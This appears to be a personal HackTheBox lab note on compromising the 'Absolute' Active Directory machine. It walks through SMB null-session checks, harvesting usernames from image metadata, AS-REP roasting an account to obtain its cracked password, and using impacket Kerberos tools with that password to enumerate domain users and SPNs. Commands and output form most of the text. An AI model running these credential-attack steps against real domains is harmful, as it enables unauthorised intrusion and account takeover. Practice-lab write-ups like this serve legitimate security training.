Its AD
DC Ports and IIS
┌──(root💀kali)-[/home/kali/htb/absolute]
└─# crackmapexec smb 10.10.11.181 -u '' -p ''
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if result['type'] is not 'searchResEntry':
SMB 10.10.11.181 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [-] absolute.htb\\: STATUS_ACCESS_DENIED
websites just images, no directories/subdomains or interesting rpc bindings
images have metadatda via exiftool
names
j.roberts
m.chaffrey
d.klay
s.osvald
j.robinson
n.smith
d.klay is asreproastable Darkmoonsky248girl
all users have STATUS_ACCOUNT_RESTRICTION
so we must kerberos it
stupid fucking kali loves time sync
timedatectl set-ntp 0
date -s '2023-3-13 15:11:25'
ntpdate 10.10.11.181 ; impacket-GetUserSPNs absolute.htb/d.klay:Darkmoonsky248girl -dc-ip 10.10.11.181 -k
┌──(root㉿kali)-[/home/kali]
└─# impacket-GetADUsers absolute.htb/d.klay:Darkmoonsky248girl -dc-ip 10.10.11.181 -k -all
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[-] CCache file is not found. Skipping...
[*] Querying DC for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2022-06-09 04:25:57.881278 2023-03-13 11:10:00.557766
Guest <never> <never>
krbtgt 2022-06-09 04:16:38.887488 <never>
J.Roberts 2022-06-09 04:25:51.038144 <never>
M.Chaffrey 2022-06-09 04:25:51.086168 <never>
D.Klay 2022-06-09 04:25:51.131289 2023-03-13 11:12:30.953212
s.osvald 2022-06-09 04:25:51.163496 <never>
j.robinson 2022-06-09 04:25:51.193797 <never>
n.smith 2022-06-09 04:25:51.225366 <never>
m.lovegod 2022-06-09 04:25:51.273008 2022-06-09 10:09:12.374044
l.moore 2022-06-09 04:25:51.303384 <never>
c.colt 2022-06-09 04:25:51.335538 <never>
s.johnson 2022-06-09 04:25:51.368843 <never>
d.lemm 2022-06-09 04:25:51.397760 <never>
svc_smb 2022-06-09 04:25:51.444699 2022-06-09 04:55:47.920804
svc_audit 2022-06-09 04:25:51.506194 <never>
winrm_user 2022-06-09 04:25:51.537539 2022-06-09 10:13:12.045465
Users
Administrator
Guest
krbtgt
J.Roberts
M.Chaffrey
D.Klay
s.osvald
j.robinson
n.smith
m.lovegod
l.moore
c.colt
s.johnson
d.lemm
svc_smb
svc_audit
winrm_user
MAKE SURE THIS SHIT IS THERE IN /ETC/HOSTS OR ELSE U WILL CRY
10.10.11.181 absolute.htb dc.absolute.htb